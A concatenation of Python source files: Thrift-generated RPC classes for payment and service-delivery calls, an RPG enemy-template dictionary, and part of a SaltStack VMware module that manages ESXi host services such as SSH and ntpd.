for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class selectService_result(object):
"""
Attributes:
- success
- err
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (wpthrift_types.ttypes.TotalPriceResponse, wpthrift_types.ttypes.TotalPriceResponse.thrift_spec), None, ), # 0
(1, TType.STRUCT, 'err', (wpthrift_types.ttypes.Error, wpthrift_types.ttypes.Error.thrift_spec), None, ), # 1
)
def __init__(self, success=None, err=None,):
self.success = success
self.err = err
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = wpthrift_types.ttypes.TotalPriceResponse()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.err = wpthrift_types.ttypes.Error()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('selectService_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class makePayment_args(object):
"""
Attributes:
- request
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'request', (wpthrift_types.ttypes.TotalPriceResponse, wpthrift_types.ttypes.TotalPriceResponse.thrift_spec), None, ), # 1
)
def __init__(self, request=None,):
self.request = request
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.request = wpthrift_types.ttypes.TotalPriceResponse()
self.request.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('makePayment_args')
if self.request is not None:
oprot.writeFieldBegin('request', TType.STRUCT, 1)
self.request.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class makePayment_result(object):
"""
Attributes:
- success
- err
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (wpthrift_types.ttypes.PaymentResponse, wpthrift_types.ttypes.PaymentResponse.thrift_spec), None, ), # 0
(1, TType.STRUCT, 'err', (wpthrift_types.ttypes.Error, wpthrift_types.ttypes.Error.thrift_spec), None, ), # 1
)
def __init__(self, success=None, err=None,):
self.success = success
self.err = err
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = wpthrift_types.ttypes.PaymentResponse()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.err = wpthrift_types.ttypes.Error()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('makePayment_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class beginServiceDelivery_args(object):
"""
Attributes:
- serviceID
- serviceDeliveryToken
- unitsToSupply
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'serviceID', None, None, ), # 1
(2, TType.STRUCT, 'serviceDeliveryToken', (wpthrift_types.ttypes.ServiceDeliveryToken, wpthrift_types.ttypes.ServiceDeliveryToken.thrift_spec), None, ), # 2
(3, TType.I32, 'unitsToSupply', None, None, ), # 3
)
def __init__(self, serviceID=None, serviceDeliveryToken=None, unitsToSupply=None,):
self.serviceID = serviceID
self.serviceDeliveryToken = serviceDeliveryToken
self.unitsToSupply = unitsToSupply
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.serviceID = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.serviceDeliveryToken = wpthrift_types.ttypes.ServiceDeliveryToken()
self.serviceDeliveryToken.read(iprot)
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I32:
self.unitsToSupply = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('beginServiceDelivery_args')
if self.serviceID is not None:
oprot.writeFieldBegin('serviceID', TType.I32, 1)
oprot.writeI32(self.serviceID)
oprot.writeFieldEnd()
if self.serviceDeliveryToken is not None:
oprot.writeFieldBegin('serviceDeliveryToken', TType.STRUCT, 2)
self.serviceDeliveryToken.write(oprot)
oprot.writeFieldEnd()
if self.unitsToSupply is not None:
oprot.writeFieldBegin('unitsToSupply', TType.I32, 3)
oprot.writeI32(self.unitsToSupply)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class beginServiceDelivery_result(object):
"""
Attributes:
- success
- err
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (wpthrift_types.ttypes.ServiceDeliveryToken, wpthrift_types.ttypes.ServiceDeliveryToken.thrift_spec), None, ), # 0
(1, TType.STRUCT, 'err', (wpthrift_types.ttypes.Error, wpthrift_types.ttypes.Error.thrift_spec), None, ), # 1
)
def __init__(self, success=None, err=None,):
self.success = success
self.err = err
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = wpthrift_types.ttypes.ServiceDeliveryToken()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.err = wpthrift_types.ttypes.Error()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('beginServiceDelivery_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class endServiceDelivery_args(object):
"""
Attributes:
- serviceID
- serviceDeliveryToken
- unitsReceived
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'serviceID', None, None, ), # 1
(2, TType.STRUCT, 'serviceDeliveryToken', (wpthrift_types.ttypes.ServiceDeliveryToken, wpthrift_types.ttypes.ServiceDeliveryToken.thrift_spec), None, ), # 2
(3, TType.I32, 'unitsReceived', None, None, ), # 3
)
def __init__(self, serviceID=None, serviceDeliveryToken=None, unitsReceived=None,):
self.serviceID = serviceID
self.serviceDeliveryToken = serviceDeliveryToken
self.unitsReceived = unitsReceived
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.serviceID = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.serviceDeliveryToken = wpthrift_types.ttypes.ServiceDeliveryToken()
self.serviceDeliveryToken.read(iprot)
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I32:
self.unitsReceived = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('endServiceDelivery_args')
if self.serviceID is not None:
oprot.writeFieldBegin('serviceID', TType.I32, 1)
oprot.writeI32(self.serviceID)
oprot.writeFieldEnd()
if self.serviceDeliveryToken is not None:
oprot.writeFieldBegin('serviceDeliveryToken', TType.STRUCT, 2)
self.serviceDeliveryToken.write(oprot)
oprot.writeFieldEnd()
if self.unitsReceived is not None:
oprot.writeFieldBegin('unitsReceived', TType.I32, 3)
oprot.writeI32(self.unitsReceived)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class endServiceDelivery_result(object):
"""
Attributes:
- success
- err
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (wpthrift_types.ttypes.ServiceDeliveryToken, wpthrift_types.ttypes.ServiceDeliveryToken.thrift_spec), None, ), # 0
(1, TType.STRUCT, 'err', (wpthrift_types.ttypes.Error, wpthrift_types.ttypes.Error.thrift_spec), None, ), # 1
)
def __init__(self, success=None, err=None,):
self.success = success
self.err = err
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = wpthrift_types.ttypes.ServiceDeliveryToken()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.err = wpthrift_types.ttypes.Error()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('endServiceDelivery_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
# --- server/src/define_enemies/forest_orcs.py (jacksonsr45/project_game_rpg_server_python, MIT) ---
__author__ = "jacksonsr45@gmail.com"
new_forest_orcs = {
    '1': {
        'name': 'little_forest_orcs',
        'life': {},
        'recharge_time': {},
        'attack': {},
        'defense': {},
        'speed_attack': {},
        'move_speed': {},
        'dodge': {},
        'inventary': {},
        'set': {},
        'init_map': {},
    },
    '2': {
        'name': 'forest_orcs',
        'life': {},
        'recharge_time': {},
        'attack': {},
        'defense': {},
        'speed_attack': {},
        'move_speed': {},
        'dodge': {},
        'inventary': {},
        'set': {},
        'init_map': {},
    },
    '3': {
        'name': 'big_forest_orcs',
        'life': {},
        'recharge_time': {},
        'attack': {},
        'defense': {},
        'speed_attack': {},
        'move_speed': {},
        'dodge': {},
        'inventary': {},
        'set': {},
        'init_map': {},
    },
}
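A hypothetical accessor (not part of the original module) showing how a tier-keyed template table such as `new_forest_orcs` is typically consumed; passing the table as an argument keeps the sketch self-contained:

```python
def get_enemy_template(table, tier):
    """Return the enemy template dict for the given tier key ('1', '2', '3')."""
    return table[str(tier)]
```

Coercing `tier` with `str()` lets callers pass either an int or the string key.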
# --- src/saltext/vmware/modules/service.py (jain-prerna/salt-ext-modules-vmware-old, Apache-2.0) ---
# SPDX-License-Identifier: Apache-2.0
import logging
import sys
import saltext.vmware.utils.vmware
from salt.utils.decorators import depends
from salt.utils.decorators import ignores_kwargs
log = logging.getLogger(__name__)
try:
# pylint: disable=no-name-in-module
from pyVmomi import (
vim,
vmodl,
pbm,
VmomiSupport,
)
# pylint: enable=no-name-in-module
# We check the supported vim versions to infer the pyVmomi version
if (
"vim25/6.0" in VmomiSupport.versionMap
and sys.version_info > (2, 7)
and sys.version_info < (2, 7, 9)
):
log.debug("pyVmomi not loaded: Incompatible versions " "of Python. See Issue #29537.")
raise ImportError()
HAS_PYVMOMI = True
except ImportError:
HAS_PYVMOMI = False
__virtualname__ = "vmware_service"
def __virtual__():
return __virtualname__
def _get_service_manager(host_reference):
"""
Helper function that returns a service manager object from a given host object.
"""
return host_reference.configManager.serviceSystem
def service_start(
host,
username,
password,
service_name,
protocol=None,
port=None,
host_names=None,
verify_ssl=True,
):
"""
Start the named service for the given host or list of hosts.
host
The location of the host.
username
The username used to login to the host, such as ``root``.
password
The password used to login to the host.
service_name
The name of the service to start. Supported service names are:
- DCUI
- TSM
- SSH
- lbtd
- lsassd
- lwiod
- netlogond
- ntpd
- sfcbd-watchdog
- snmpd
- vprobed
- vpxa
- xorg
protocol
Optionally set to alternate protocol if the host is not using the default
protocol. Default protocol is ``https``.
port
Optionally set to alternate port if the host is not using the default
port. Default port is ``443``.
host_names
List of ESXi host names. When the host, username, and password credentials
are provided for a vCenter Server, the host_names argument is required to tell
vCenter the hosts for which to start the service.
If host_names is not provided, the service will be started for the ``host``
location instead. This is useful for when service instance connection information
is used for a single ESXi host.
verify_ssl
Verify the SSL certificate. Default: True
CLI Example:
.. code-block:: bash
# Used for single ESXi host connection information
salt '*' vsphere.service_start my.esxi.host root bad-password 'ntpd'
# Used for connecting to a vCenter Server
salt '*' vsphere.service_start my.vcenter.location root bad-password 'ntpd' \
host_names='[esxi-1.host.com, esxi-2.host.com]'
"""
service_instance = saltext.vmware.utils.vmware.get_service_instance(
host=host,
username=username,
password=password,
protocol=protocol,
port=port,
verify_ssl=verify_ssl,
)
host_names = _check_hosts(service_instance, host, host_names)
valid_services = [
"DCUI",
"TSM",
"SSH",
"ssh",
"lbtd",
"lsassd",
"lwiod",
"netlogond",
"ntpd",
"sfcbd-watchdog",
"snmpd",
"vprobed",
"vpxa",
"xorg",
]
ret = {}
# Don't require users to know that VMware lists the ssh service as TSM-SSH
if service_name == "SSH" or service_name == "ssh":
temp_service_name = "TSM-SSH"
else:
temp_service_name = service_name
for host_name in host_names:
# Check if the service_name provided is a valid one.
# If we don't have a valid service, return. The service will be invalid for all hosts.
if service_name not in valid_services:
ret.update(
{host_name: {"Error": "{} is not a valid service name.".format(service_name)}}
)
return ret
host_ref = _get_host_ref(service_instance, host, host_name=host_name)
service_manager = _get_service_manager(host_ref)
log.debug("Starting the '{}' service on {}.".format(service_name, host_name))
# Start the service
try:
service_manager.StartService(id=temp_service_name)
except vim.fault.HostConfigFault as err:
msg = "'vsphere.service_start' failed for host {}: {}".format(host_name, err)
log.debug(msg)
ret.update({host_name: {"Error": msg}})
continue
# Some services are restricted by the vSphere License Level.
except vim.fault.RestrictedVersion as err:
log.debug(err)
ret.update({host_name: {"Error": err}})
continue
ret.update({host_name: {"Service Started": True}})
return ret
def service_stop(
host,
username,
password,
service_name,
protocol=None,
port=None,
host_names=None,
verify_ssl=True,
):
"""
Stop the named service for the given host or list of hosts.
host
The location of the host.
username
The username used to login to the host, such as ``root``.
password
The password used to login to the host.
service_name
The name of the service to stop. Supported service names are:
- DCUI
- TSM
- SSH
- lbtd
- lsassd
- lwiod
- netlogond
- ntpd
- sfcbd-watchdog
- snmpd
- vprobed
- vpxa
- xorg
protocol
Optionally set to alternate protocol if the host is not using the default
protocol. Default protocol is ``https``.
port
Optionally set to alternate port if the host is not using the default
port. Default port is ``443``.
host_names
List of ESXi host names. When the host, username, and password credentials
are provided for a vCenter Server, the host_names argument is required to tell
vCenter the hosts for which to stop the service.
If host_names is not provided, the service will be stopped for the ``host``
location instead. This is useful for when service instance connection information
is used for a single ESXi host.
verify_ssl
Verify the SSL certificate. Default: True
CLI Example:
.. code-block:: bash
# Used for single ESXi host connection information
salt '*' vsphere.service_stop my.esxi.host root bad-password 'ssh'
# Used for connecting to a vCenter Server
salt '*' vsphere.service_stop my.vcenter.location root bad-password 'ssh' \
host_names='[esxi-1.host.com, esxi-2.host.com]'
"""
service_instance = saltext.vmware.utils.vmware.get_service_instance(
host=host,
username=username,
password=password,
protocol=protocol,
port=port,
verify_ssl=verify_ssl,
)
host_names = _check_hosts(service_instance, host, host_names)
valid_services = [
"DCUI",
"TSM",
"SSH",
"ssh",
"lbtd",
"lsassd",
"lwiod",
"netlogond",
"ntpd",
"sfcbd-watchdog",
"snmpd",
"vprobed",
"vpxa",
"xorg",
]
ret = {}
# Don't require users to know that VMware lists the ssh service as TSM-SSH
if service_name == "SSH" or service_name == "ssh":
temp_service_name = "TSM-SSH"
else:
temp_service_name = service_name
for host_name in host_names:
# Check if the service_name provided is a valid one.
# If we don't have a valid service, return. The service will be invalid for all hosts.
if service_name not in valid_services:
ret.update(
{host_name: {"Error": "{} is not a valid service name.".format(service_name)}}
)
return ret
host_ref = _get_host_ref(service_instance, host, host_name=host_name)
service_manager = _get_service_manager(host_ref)
log.debug("Stopping the '{}' service on {}.".format(service_name, host_name))
# Stop the service.
try:
service_manager.StopService(id=temp_service_name)
except vim.fault.HostConfigFault as err:
msg = "'vsphere.service_stop' failed for host {}: {}".format(host_name, err)
log.debug(msg)
ret.update({host_name: {"Error": msg}})
continue
# Some services are restricted by the vSphere License Level.
except vim.fault.RestrictedVersion as err:
log.debug(err)
ret.update({host_name: {"Error": err}})
continue
ret.update({host_name: {"Service Stopped": True}})
return ret
def service_restart(
host,
username,
password,
service_name,
protocol=None,
port=None,
host_names=None,
verify_ssl=True,
):
"""
Restart the named service for the given host or list of hosts.
host
The location of the host.
username
The username used to login to the host, such as ``root``.
password
The password used to login to the host.
service_name
The name of the service for which to set the policy. Supported service names are:
- DCUI
- TSM
- SSH
- lbtd
- lsassd
- lwiod
- netlogond
- ntpd
- sfcbd-watchdog
- snmpd
- vprobed
- vpxa
- xorg
protocol
Optionally set to alternate protocol if the host is not using the default
protocol. Default protocol is ``https``.
port
Optionally set to alternate port if the host is not using the default
port. Default port is ``443``.
host_names
List of ESXi host names. When the host, username, and password credentials
are provided for a vCenter Server, the host_names argument is required to tell
vCenter the hosts for which to restart the service.
If host_names is not provided, the service will be restarted for the ``host``
location instead. This is useful for when service instance connection information
is used for a single ESXi host.
verify_ssl
Verify the SSL certificate. Default: True
CLI Example:
.. code-block:: bash
# Used for single ESXi host connection information
salt '*' vsphere.service_restart my.esxi.host root bad-password 'ntpd'
# Used for connecting to a vCenter Server
salt '*' vsphere.service_restart my.vcenter.location root bad-password 'ntpd' \
host_names='[esxi-1.host.com, esxi-2.host.com]'
"""
service_instance = saltext.vmware.utils.vmware.get_service_instance(
host=host,
username=username,
password=password,
protocol=protocol,
port=port,
verify_ssl=verify_ssl,
)
host_names = _check_hosts(service_instance, host, host_names)
valid_services = [
"DCUI",
"TSM",
"SSH",
"ssh",
"lbtd",
"lsassd",
"lwiod",
"netlogond",
"ntpd",
"sfcbd-watchdog",
"snmpd",
"vprobed",
"vpxa",
"xorg",
]
ret = {}
# Don't require users to know that VMware lists the ssh service as TSM-SSH
if service_name == "SSH" or service_name == "ssh":
temp_service_name = "TSM-SSH"
else:
temp_service_name = service_name
for host_name in host_names:
# Check if the service_name provided is a valid one.
# If we don't have a valid service, return. The service will be invalid for all hosts.
if service_name not in valid_services:
ret.update(
{host_name: {"Error": "{} is not a valid service name.".format(service_name)}}
)
return ret
host_ref = _get_host_ref(service_instance, host, host_name=host_name)
service_manager = _get_service_manager(host_ref)
log.debug("Restarting the '{}' service on {}.".format(service_name, host_name))
# Restart the service.
try:
service_manager.RestartService(id=temp_service_name)
except vim.fault.HostConfigFault as err:
msg = "'vsphere.service_restart' failed for host {}: {}".format(host_name, err)
log.debug(msg)
ret.update({host_name: {"Error": msg}})
continue
# Some services are restricted by the vSphere License Level.
except vim.fault.RestrictedVersion as err:
log.debug(err)
ret.update({host_name: {"Error": err}})
continue
ret.update({host_name: {"Service Restarted": True}})
return ret
def set_service_policy(
host,
username,
password,
service_name,
service_policy,
protocol=None,
port=None,
host_names=None,
verify_ssl=True,
):
"""
Set the service name's policy for a given host or list of hosts.
host
The location of the host.
username
The username used to login to the host, such as ``root``.
password
The password used to login to the host.
service_name
The name of the service for which to set the policy. Supported service names are:
- DCUI
- TSM
- SSH
- lbtd
- lsassd
- lwiod
- netlogond
- ntpd
- sfcbd-watchdog
- snmpd
- vprobed
- vpxa
- xorg
service_policy
The policy to set for the service. For example, 'automatic'.
protocol
Optionally set to alternate protocol if the host is not using the default
protocol. Default protocol is ``https``.
port
Optionally set to alternate port if the host is not using the default
port. Default port is ``443``.
host_names
List of ESXi host names. When the host, username, and password credentials
are provided for a vCenter Server, the host_names argument is required to tell
vCenter the hosts for which to set the service policy.
If host_names is not provided, the service policy information will be retrieved
for the ``host`` location instead. This is useful for when service instance
connection information is used for a single ESXi host.
verify_ssl
Verify the SSL certificate. Default: True
CLI Example:
.. code-block:: bash
# Used for single ESXi host connection information
salt '*' vsphere.set_service_policy my.esxi.host root bad-password 'ntpd' 'automatic'
# Used for connecting to a vCenter Server
salt '*' vsphere.set_service_policy my.vcenter.location root bad-password 'ntpd' 'automatic' \
host_names='[esxi-1.host.com, esxi-2.host.com]'
"""
service_instance = saltext.vmware.utils.vmware.get_service_instance(
host=host,
username=username,
password=password,
protocol=protocol,
port=port,
verify_ssl=verify_ssl,
)
host_names = _check_hosts(service_instance, host, host_names)
valid_services = [
"DCUI",
"TSM",
"SSH",
"ssh",
"lbtd",
"lsassd",
"lwiod",
"netlogond",
"ntpd",
"sfcbd-watchdog",
"snmpd",
"vprobed",
"vpxa",
"xorg",
]
ret = {}
for host_name in host_names:
# Check if the service_name provided is a valid one.
# If we don't have a valid service, return. The service will be invalid for all hosts.
if service_name not in valid_services:
ret.update(
{host_name: {"Error": "{} is not a valid service name.".format(service_name)}}
)
return ret
host_ref = _get_host_ref(service_instance, host, host_name=host_name)
service_manager = _get_service_manager(host_ref)
services = host_ref.configManager.serviceSystem.serviceInfo.service
# Services are stored in a general list - we need loop through the list and find
# service key that matches our service name.
for service in services:
service_key = None
# Find the service key based on the given service_name
if service.key == service_name:
service_key = service.key
elif service_name == "ssh" or service_name == "SSH":
if service.key == "TSM-SSH":
service_key = "TSM-SSH"
# If we have a service_key, we've found a match. Update the policy.
if service_key:
try:
service_manager.UpdateServicePolicy(id=service_key, policy=service_policy)
except vim.fault.NotFound:
msg = "The service name '{}' was not found.".format(service_name)
log.debug(msg)
ret.update({host_name: {"Error": msg}})
continue
# Some services are restricted by the vSphere License Level.
except vim.fault.HostConfigFault as err:
msg = "'vsphere.set_service_policy' failed for host {}: {}".format(
host_name, err
)
log.debug(msg)
ret.update({host_name: {"Error": msg}})
continue
ret.update({host_name: True})
# If we made it this far, something else has gone wrong.
if ret.get(host_name) is None:
msg = "Could not find service '{}' for host '{}'.".format(service_name, host_name)
log.debug(msg)
ret.update({host_name: {"Error": msg}})
return ret
def get_service_policy(
host,
username,
password,
service_name,
protocol=None,
port=None,
host_names=None,
verify_ssl=True,
):
"""
Get the service name's policy for a given host or list of hosts.
host
The location of the host.
username
The username used to login to the host, such as ``root``.
password
The password used to login to the host.
service_name
The name of the service for which to retrieve the policy. Supported service names are:
- DCUI
- TSM
- SSH
- lbtd
- lsassd
- lwiod
- netlogond
- ntpd
- sfcbd-watchdog
- snmpd
- vprobed
- vpxa
- xorg
protocol
Optionally set to alternate protocol if the host is not using the default
protocol. Default protocol is ``https``.
port
Optionally set to alternate port if the host is not using the default
port. Default port is ``443``.
host_names
List of ESXi host names. When the host, username, and password credentials
are provided for a vCenter Server, the host_names argument is required to tell
vCenter the hosts for which to get service policy information.
If host_names is not provided, the service policy information will be retrieved
for the ``host`` location instead. This is useful for when service instance
connection information is used for a single ESXi host.
verify_ssl
Verify the SSL certificate. Default: True
CLI Example:
.. code-block:: bash
# Used for single ESXi host connection information
salt '*' vsphere.get_service_policy my.esxi.host root bad-password 'ssh'
# Used for connecting to a vCenter Server
salt '*' vsphere.get_service_policy my.vcenter.location root bad-password 'ntpd' \
host_names='[esxi-1.host.com, esxi-2.host.com]'
"""
service_instance = salt.utils.vmware.get_service_instance(
host=host,
username=username,
password=password,
protocol=protocol,
port=port,
verify_ssl=verify_ssl,
)
valid_services = [
"DCUI",
"TSM",
"SSH",
"ssh",
"lbtd",
"lsassd",
"lwiod",
"netlogond",
"ntpd",
"sfcbd-watchdog",
"snmpd",
"vprobed",
"vpxa",
"xorg",
]
host_names = _check_hosts(service_instance, host, host_names)
ret = {}
for host_name in host_names:
# Check if the service_name provided is a valid one.
# If we don't have a valid service, return. The service will be invalid for all hosts.
if service_name not in valid_services:
ret.update(
{host_name: {"Error": "{} is not a valid service name.".format(service_name)}}
)
return ret
host_ref = _get_host_ref(service_instance, host, host_name=host_name)
services = host_ref.configManager.serviceSystem.serviceInfo.service
# Don't require users to know that VMware lists the ssh service as TSM-SSH
if service_name == "SSH" or service_name == "ssh":
temp_service_name = "TSM-SSH"
else:
temp_service_name = service_name
# Loop through services until we find a matching name
for service in services:
if service.key == temp_service_name:
ret.update({host_name: {service_name: service.policy}})
# We've found a match - break out of the loop so we don't overwrite the
# Updated host_name value with an error message.
break
else:
msg = "Could not find service '{}' for host '{}'.".format(service_name, host_name)
ret.update({host_name: {"Error": msg}})
# If we made it this far, something else has gone wrong.
if ret.get(host_name) is None:
msg = "'vsphere.get_service_policy' failed for host {}.".format(host_name)
log.debug(msg)
ret.update({host_name: {"Error": msg}})
return ret
def get_service_running(
host,
username,
password,
service_name,
protocol=None,
port=None,
host_names=None,
verify_ssl=True,
):
"""
Get the service name's running state for a given host or list of hosts.
host
The location of the host.
username
The username used to login to the host, such as ``root``.
password
The password used to login to the host.
service_name
The name of the service for which to retrieve the policy. Supported service names are:
- DCUI
- TSM
- SSH
- lbtd
- lsassd
- lwiod
- netlogond
- ntpd
- sfcbd-watchdog
- snmpd
- vprobed
- vpxa
- xorg
protocol
Optionally set to alternate protocol if the host is not using the default
protocol. Default protocol is ``https``.
port
Optionally set to alternate port if the host is not using the default
port. Default port is ``443``.
host_names
